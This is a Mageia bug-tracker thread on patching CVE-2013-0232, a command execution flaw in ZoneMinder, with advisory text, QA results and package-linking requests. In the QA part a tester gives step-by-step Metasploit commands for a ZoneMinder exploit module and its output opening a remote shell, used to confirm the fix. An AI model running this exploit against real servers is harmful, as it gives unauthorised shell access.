Debian has issued an advisory on March 14:
http://www.debian.org/security/2013/dsa-2640
CC: (none) => zen25000
Assignee: bugsquad => zen25000
Whiteboard: (none) => MGA2TOO
(In reply to David Walser from comment #0)
> Debian has issued an advisory on March 14:
> http://www.debian.org/security/2013/dsa-2640

Thanks for bringing this to my attention.

CVE-2013-0332
This is already handled upstream in the source tarball that we are using in both 2 and Cauldron.

CVE-2013-0232
I have patched both 2 and Cauldron versions locally and am testing builds of both before pushing to Cauldron and 2/updates-testing.
############################
Advisory

zoneminder packages have been updated for the following vulnerability.

CVE-2013-0232
zoneminder is prone to an arbitrary command execution vulnerability. Remote (authenticated) attackers could execute arbitrary commands as the web server user.

References:
http://www.zoneminder.com/forums/viewtopic.php?f=29&t=20771
http://itsecuritysolutions.org/2013-01-22-ZoneMinder-Video-Server-arbitrary-command-execution-vulnerability/
https://bugzilla.redhat.com/show_bug.cgi?id=904104

Updated packages in 2/core/updates_testing:
========================
zoneminder-1.25.0-10.2.mga2.x86_64.rpm
zoneminder-1.25.0-10.2.mga2.i586.rpm

Source rpm:
zoneminder-1.25.0-10.2.mga2.src.rpm

Note:
This will need pushing to tainted as well as core when accepted.
Thanks.

(In reply to Barry Jackson from comment #2)
> Note:
> This will need pushing to tainted as well as core when accepted.

Then you'll need to push a build to tainted.

mgarepo submit zoneminder --define section=tainted/release
mgarepo 2/zoneminder --define section=tainted/updates_testing -t 2
I already did for cauldron - now done for 2 as well.
Thanks Barry!

Assigning to QA.

Advisory:
========================

Updated zoneminder package fixes security vulnerability:

zoneminder is prone to an arbitrary command execution vulnerability. Remote (authenticated) attackers could execute arbitrary commands as the web server user (CVE-2013-0232).

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0232
http://www.zoneminder.com/forums/viewtopic.php?f=29&t=20771
http://itsecuritysolutions.org/2013-01-22-ZoneMinder-Video-Server-arbitrary-command-execution-vulnerability/
https://bugzilla.redhat.com/show_bug.cgi?id=904104
http://www.debian.org/security/2013/dsa-2640
========================

Updated packages in {core,tainted}/updates_testing:
========================
zoneminder-1.25.0-10.2.mga2

from zoneminder-1.25.0-10.2.mga2.src.rpm
Version: Cauldron => 2
Assignee: zen25000 => qa-bugs
Whiteboard: MGA2TOO => (none)
There are two srpms
zoneminder-1.25.0-10.2.mga2.src.rpm
zoneminder-1.25.0-10.2.mga2.tainted.src.rpm

Testing x86_64

Before
------
Confirmed vulnerable using the module in metasploit from git

$ mkdir metasploit
$ cd metasploit
$ git clone https://github.com/bcoles/metasploit-framework.git
$ cd metasploit-framework
$ ./msfconsole -L

At msf prompt

msf > use exploit/unix/webapp/zoneminder_packagecontrol_exec
msf exploit(zoneminder_packagecontrol_exec) > set RHOST <IP of zoneminder server>

If you've set a login on zoneminder also set USERNAME and set PASSWORD

msf exploit(zoneminder_packagecontrol_exec) > exploit

[*] ServerIP:80 - Authenticating as user 'username'
[*] Started reverse double handler
[+] ServerIP:80 - Authenticated successfully
[*] ServerIP:80 - Sending payload (525 bytes)
[+] ServerIP:80 - Payload sent successfully
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo bP9pMxbEZnF9eZC9;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "bP9pMxbEZnF9eZC9\r\n"
[*] Matching...
[*] B is input...
[*] ServerIP - Command shell session 1 opened at Sat Mar 16 18:33:13 +0000 2013

ls
ajax
cambozola.jar
css
events
graphics
images
includes
index.php
js
lang
mootools-1.2.3-core-yc.js
mootools.js
skins
sounds
temp
tools
views
^C
Abort session 1? [y/N] y

[*] Command shell session 1 closed. Reason: User exit

msf exploit(zoneminder_packagecontrol_exec) > quit

After
-----
msf exploit(zoneminder_packagecontrol_exec) > exploit

[*] Started reverse double handler
[*] ServerIP:80 - Authenticating as user 'username'
[+] ServerIP:80 - Authenticated successfully
[*] ServerIP:80 - Sending payload (525 bytes)
[+] ServerIP:80 - Payload sent successfully

msf exploit(zoneminder_packagecontrol_exec) > quit

Tested again with zoneminder from tainted updates testing - OK

No regressions noticed.
Adding bug 2317 for links required from core release to tainted updates testing

Running checks for "zoneminder" using media
"Core Release" and "Tainted Updates Testing".
----------------------------------------
Mageia release 2 (Official) for x86_64
Latest version found in "Core Release" is zoneminder-1.25.0-10.mga2
Latest version found in "Tainted Updates Testing" is zoneminder-1.25.0-10.2.mga2.tainted
----------------------------------------
The following packages will require linking:

lame-3.99.5-1.mga2.tainted (Tainted Release)
libatk1.0_0-2.4.0-1.mga2 (Core 32bit Release)
libbzip2_1-1.0.6-1.mga2 (Core 32bit Release)
libcairo2-1.10.2-6.mga2 (Core 32bit Release)
libcairo-xcb2-1.10.2-6.mga2 (Core 32bit Release)
libdatrie1-0.2.5-1.mga2 (Core 32bit Release)
libfontconfig1-2.8.0-6.mga2 (Core 32bit Release)
libgamin-1_0-0.1.10-8.mga2 (Core 32bit Release)
libgnome-keyring0-3.4.1-1.mga2 (Core 32bit Release)
libjasper1-1.900.1-13.mga2 (Core 32bit Release)
liblzma5-5.0.3-3.mga2 (Core 32bit Release)
libpcre0-8.21-1.mga2 (Core 32bit Release)
libpng15_15-1.5.10-1.mga2 (Core 32bit Release)
libsasl2-2.1.23-19.mga2 (Core 32bit Release)
libsoup2.4_1-2.38.1-1.mga2 (Core 32bit Release)
libthai0-0.1.14-1.mga1 (Core 32bit Release)
libudev0-181-8.mga2 (Core 32bit Release)
libxft2-2.3.0-1.mga2 (Core 32bit Release)
libxrender1-0.9.7-1.mga2 (Core 32bit Release)
----------------------------------------
Depends on: (none) => 2317
Whiteboard: (none) => has_procedure mga2-64-OK
Testing complete mga2 32

Advisory:
========================

Updated zoneminder package fixes security vulnerability:

Zoneminder is prone to an arbitrary command execution vulnerability. Remote (authenticated) attackers could execute arbitrary commands as the web server user (CVE-2013-0232).

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0232
http://www.zoneminder.com/forums/viewtopic.php?f=29&t=20771
http://itsecuritysolutions.org/2013-01-22-ZoneMinder-Video-Server-arbitrary-command-execution-vulnerability/
https://bugzilla.redhat.com/show_bug.cgi?id=904104
http://www.debian.org/security/2013/dsa-2640
========================

SRPM's:
zoneminder-1.25.0-10.2.mga2.src.rpm
zoneminder-1.25.0-10.2.mga2.tainted.src.rpm

For bug 2317..
----------------------------------------
The following packages will require linking:

lame-3.99.5-1.mga2.tainted (Tainted Release)
libatk1.0_0-2.4.0-1.mga2 (Core 32bit Release)
libbzip2_1-1.0.6-1.mga2 (Core 32bit Release)
libcairo2-1.10.2-6.mga2 (Core 32bit Release)
libcairo-xcb2-1.10.2-6.mga2 (Core 32bit Release)
libdatrie1-0.2.5-1.mga2 (Core 32bit Release)
libfontconfig1-2.8.0-6.mga2 (Core 32bit Release)
libgamin-1_0-0.1.10-8.mga2 (Core 32bit Release)
libgnome-keyring0-3.4.1-1.mga2 (Core 32bit Release)
libjasper1-1.900.1-13.mga2 (Core 32bit Release)
liblzma5-5.0.3-3.mga2 (Core 32bit Release)
libpcre0-8.21-1.mga2 (Core 32bit Release)
libpng15_15-1.5.10-1.mga2 (Core 32bit Release)
libsasl2-2.1.23-19.mga2 (Core 32bit Release)
libsoup2.4_1-2.38.1-1.mga2 (Core 32bit Release)
libthai0-0.1.14-1.mga1 (Core 32bit Release)
libudev0-181-8.mga2 (Core 32bit Release)
libxft2-2.3.0-1.mga2 (Core 32bit Release)
libxrender1-0.9.7-1.mga2 (Core 32bit Release)
----------------------------------------

Could sysadmin please push from core & tainted updates testing to core & tainted updates and also make the required links for bug 2317.

Thanks!
Keywords: (none) => validated_update
Whiteboard: has_procedure mga2-64-OK => has_procedure mga2-64-OK mga2-32-ok
CC: (none) => sysadmin-bugs
Packages linked and update pushed:
https://wiki.mageia.org/en/Support/Advisories/MGASA-2013-0104
Status: NEW => RESOLVED
CC: (none) => tmb
Resolution: (none) => FIXED